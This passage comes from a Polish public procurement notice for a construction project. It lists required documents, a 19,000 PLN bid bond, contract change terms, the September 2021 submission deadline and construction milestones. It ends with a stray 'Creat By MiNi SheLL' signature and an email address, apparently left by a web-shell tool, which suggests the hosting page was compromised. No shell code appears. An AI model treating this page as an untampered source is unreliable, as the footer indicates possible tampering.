SWZ,<br/>• wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – według wzoru stanowiącego<br/>Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawcy z udziału w postępowaniu w postępowaniu:<br/>• zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>• zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>• odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy, sporządzonych nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku występowania po stronie Wykonawcy podmiotu udostepniającego zasoby na<br/>potwierdzenia spełnienia warunków udziału w postępowaniu, zobowiązany do złożenia dokumentów<br/>wskazanych powyżej będzie również podmiot udostępniający zasoby.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 16.1. Wykaz dokumentów składających się na ofertę.<br/>• formularz ofertowy – według wzoru stanowiącego Załącznik nr 5 do SWZ. W przypadku, gdy<br/>Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy<br/>zamieścić wszystkie informacje wymagane w formularzu ofertowym. W formularzu oferty<br/>Wykonawca zobowiązany jest podać adres skrzynki ePUAP lub email, z wykorzystaniem którego<br/>prowadzona będzie korespondencja związana z postępowaniem;<br/>• Harmonogram rzeczowo- finansowy;<br/>• wykaz doświadczenia Kierownika budowy w ramach kryteriów oceny ofert (Załącznik nr 10 do<br/>SIWZ)<br/>• aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postepowaniu, składane na podstawie art. 125 ust. 1 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych – wzory oświadczeń zawarto w Załącznik nr 6-7<br/>do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców;<br/>• aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postepowaniu, składane na podstawie art. 125 ust. 1 w związku art. 125<br/>ust. 5 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – wzory oświadczeń<br/>zawarto w Załącznik nr 6-7 do SWZ. W przypadku polegania na zdolnościach na zdolnościach<br/>lub sytuacji podmiotów udostępniających zasoby;<br/>• następujące przedmiotowe środki dowodowe - Zamawiający nie wymaga złożenia wraz z<br/>ofertą przedmiotowych środków dowodowych.<br/>16.2. Dodatkowo do oferty należy dołączyć :<br/>• zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia - według wzoru załącznik nr 12 do SWZ;<br/>• pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>• pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia umowy w sprawie<br/>zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia -<br/>dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>• potwierdzenie wniesienia wadium;<br/>oświadczenie dot. elektromobilności, sporządzenie zgodnie z wzorem stanowiącym Załącznik<br/>nr 13 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia Wadium w kwocie 19 000,00 pln (słownie:<br/>dziewiętnaście tysięcy złotych). 2. Szczegółowe informacje dot. wnoszenia wadium zawarto w<br/>pkt.<br/>15. SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Do oferty należy dołączyć pełnomocnictwo dla pełnomocnika do reprezentowania w<br/>postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia i/lub zawarcia<br/>umowy w sprawie zamówienia w imieniu Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia20. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.3. W przypadku, o którym mowa w pkt.<br/>20.1.3.4. SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania istotnych zmian umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z Wzorem umowy i Ustawą<br/>PZP.2. Wykonawca ma obowiązek udokumentować zaistniałe okoliczności powodujące zmianę<br/>umowy.3. Przewidzenie przez Zamawiającego możliwości wprowadzenia istotnych zmian do<br/>zawartej umowy nie przesądza o obligatoryjności ich dokonania. Wystąpienie przesłanek zmiany<br/>umowy będzie każdorazowo podlegało szczegółowej analizie, po dokonaniu której zostanie<br/>podjęta decyzja, co do ewentualnego wprowadzenia zmiany w treści umowy. 4. Projektowane<br/>postanowienia umowne, określające w swej treści przesłanki zmiany umowy określone przez<br/>Zamawiającego stanowią Załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania. 2. Sposób złożenia oferty, opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin zakończenia przedmiotu umowy – 270 dni od dnia podpisania umowy z podziałem na 3 kamienie milowe:<br/>•	KM 1- osiągnięcie zaawansowania robót budowlanych na poziomie 10 % wartości całości robót budowlanych, w tym wykonanie fundamentów budynku i ścian fundamentowych- 60 dni od zawarcia umowy; <br/>•	KM 2- osiągnięcie zaawansowania robót budowlanych na poziomie 50 % wartości całości robót budowlanych, w tym wykonanie wszystkich robót murowych i żelbetowych przy budynku do poziomu stropu (włącznie ze stropem) - wykonany dach- 180 dni od zawarcia umowy; <br/>•	KM 3- osiągnięcie zaawansowania robót budowlanych na poziomie 75 % wartości całości robót budowlanych, w tym montaż okien i drzwi zewnętrznych w budynku- do 210 dni od zawarcia umowy;

Creat By MiNi SheLL
Email: jattceo@gmail.com